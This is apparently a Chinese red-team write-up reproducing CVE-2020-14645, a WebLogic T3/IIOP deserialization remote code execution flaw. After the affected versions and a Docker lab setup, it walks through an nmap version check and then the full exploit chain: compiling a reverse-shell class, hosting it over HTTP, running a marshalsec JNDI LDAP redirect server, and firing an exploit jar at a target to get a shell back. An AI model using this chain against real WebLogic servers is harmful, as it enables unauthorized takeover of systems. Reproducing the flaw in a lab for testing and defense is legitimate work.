红蓝对抗,漏洞复现

CVE-2020-14645_weblogic_T3反序列化RCE复测

影响版本

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). 受影响版本:10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 以及 14.1.1.0.0. 影响:简单的漏洞利用即可允许攻击者通过IIOP未授权访问Oracle WebLogic T3。攻击者可利用漏洞接管网站。 CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

环境搭建

docker pull z1du/weblogic12214jdk8u181 windows10 https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html12

漏洞验证

工具准备: git clone git@github.com:mbechler/marshalsec.git mvn clean package -DskipTests

漏洞poc测试

通过nmap检测版本

nmap -n -v -Pn –sV IP地址 -p 端口 --script=/usr/share/nmap/scripts/weblogic-t3-info.nse
PORT     STATE SERVICE
7001/tcp open  afs3-callback
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 12.2.1.4)

测试RCE

  1. rce编译 编译: RevShell.java 编译class文件 javac RevShell.java

  2. 开启http服务,挂在class文件

python3 -m http.server 5001

访问本地http://192.168.31.102:5001/RevShell.class 200,可访问挂载成功

  1. 配置开启LDAP服务 java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec. [-a] [-v] [-t] [<gadget_type> [<arguments…>]] java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.31.102:5001/#RevShell 1099
  2. rce 命令执行 java -jar CVE-2020-14645.jar 192.168.31.102:1099/#RevShell http://test.com:7001 Weblogic version: 12.2.1.4 反弹shell